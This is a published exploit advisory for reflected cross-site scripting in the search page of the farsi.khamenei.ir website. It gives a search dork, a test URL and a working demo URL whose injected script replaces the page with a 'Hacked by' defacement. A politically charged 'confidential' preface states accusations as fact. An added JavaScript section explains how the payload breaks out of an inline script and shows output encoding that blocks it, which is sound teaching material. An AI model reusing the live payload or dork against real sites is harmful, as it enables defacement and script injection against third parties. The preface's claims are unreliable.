Khameneie.ir XSS vulnerabilities

2022.10.23
ua E1.Coders (UA) ua
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
confidential "Top Secret"
This message is written to describe the security issue and is confidential and should not be included in the report. This site belongs to the organization of the leader of the Islamic Republic of Iran, "Khamenei", who ordered the killing of Mehsa Amini, a 22-year-old Iranian woman; she was killed by the morality police, the people protested in the streets, and now the Iranian police are trying to identify these people. This site has a security issue with an XSS vulnerability. We have reported many times to this site that it has a security problem and it has ignored our report. We want to definitely register and report this security issue.
-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*

##################################################
#
# Exploit Title : Khameneie.ir has XSS vulnerabilities
#
# Author : E1.Coders
#
# Contact : E1.Coders [at] Mail [dot] RU
#
# Portal Link : khamenei.ir (https://farsi.khamenei.ir)
#
# Tested ON : All language version hosts
#
# Security Risk : ~[Critical]~
#
# Description : All websites using this version can be targeted
#
# DorK : intext:"site:farsi.khamenei.ir/search-result?q="
#        site:farsi.khamenei.ir/search-result?q=YOUR KEYWORD&
#
##################################################

Details : the vulnerable file is "book-archive"

XSS Expl0iTs : https://farsi.khamenei.ir/search-result?q=%3CXSS%20SCRIPT%3E&nt=99,101,2,4,9,1,16,

Dem0 :
https://farsi.khamenei.ir/search-result?q=%3C/script%3E%3Cscript%3Edocument.documentElement.innerHTML=%22%3Ccenter%3E%3Ch1%3EHacked%20by%20E1.Coders%3C/h1%3E%3Cimg%20src=%27https://cybercrimemag.wpenginepowered.com/wp-content/uploads/2018/11/Keyboard-Typing-700x467.jpg%27%3E%3Ccenter%3E%3Ch2%3ERUSSIAN%20-%20BLACK%20-%HAT%20%3C/h2%3E%3C/center%3E%3Ch2%3ESECURITY_is_Low%20~Fuck~%3C/h2%3E%3C/center%3E%22%3C/script%3E&nt=99,101,2,4,9,1,16
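The demo payload above opens with `</script>`, which only makes sense if the search term is reflected inside an inline script block: the HTML parser ends that script at the first `</script`, and everything after it is attacker-controlled markup. The following is an added example written for this page, not code from the advisory author or from the khamenei.ir site, which models such a reflection and shows the encoding that defeats it. The page template, the `searchTerm` variable, the function names and the `example.invalid` host are assumptions; the payload is a shortened, constructed form of the advisory's demo.

```javascript
// Added example (not from the advisory): a minimal model of a search-result
// page that reflects ?q= into an inline <script> and into the body, beside a
// hardened version. Template, variable and function names are assumptions.

// Shortened form of the advisory's demo payload (constructed for this example).
const PAYLOAD = '</script><script>document.documentElement.innerHTML="Hacked"</script>';

// Extract q the way the page would: URLSearchParams percent-decodes it.
function getQuery(urlString) {
  return new URL(urlString).searchParams.get('q') || '';
}

// Vulnerable rendering: the raw term is concatenated into a JS string literal
// and into the page body. Inside the script, the browser stops at the first
// "</script", so the attacker's <script> opens a second, fully controlled one.
function renderVulnerable(q) {
  return '<script>var searchTerm = "' + q + '";</script>\n' +
         '<div id="results">Results for ' + q + '</div>';
}

// Hardened rendering for the script context: JSON-encode the value, then
// additionally escape < and > (and the JS line terminators U+2028/U+2029)
// so the sequence "</script" can never appear inside the inline script.
function encodeForScript(value) {
  return JSON.stringify(value)
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// Hardened rendering for the HTML body: entity-encode the five characters
// that can change parsing state in text or attribute context.
function escapeHtml(value) {
  return value.replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

function renderSafe(q) {
  return '<script>var searchTerm = ' + encodeForScript(q) + ';</script>\n' +
         '<div id="results">Results for ' + escapeHtml(q) + '</div>';
}

// Crude but useful regression check: count how many <script elements the
// HTML parser would see. Reflecting a single search term must never add one.
function countScriptTags(html) {
  return (html.match(/<script\b/gi) || []).length;
}

// Constructed request URL that carries the payload, mirroring the advisory's
// ?q=...&nt=... shape (example.invalid is an assumption, not the real host).
const demoUrl = 'https://example.invalid/search-result?q=' +
  encodeURIComponent(PAYLOAD) + '&nt=99,101,2,4,9,1,16';
const q = getQuery(demoUrl);

console.log('vulnerable:', countScriptTags(renderVulnerable(q)), 'script tag(s)');
console.log('hardened:  ', countScriptTags(renderSafe(q)), 'script tag(s)');
```

Run with `node`; the vulnerable template yields three `<script` starts for one reflected term (the original plus one injected from each reflection point), the hardened one yields exactly one. Note that JSON encoding alone is not sufficient for an inline script, because `JSON.stringify` does not escape `<` or `/`; the extra `\u003c` substitution is what closes the `</script` break-out.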


Copyright 2022, cxsecurity.com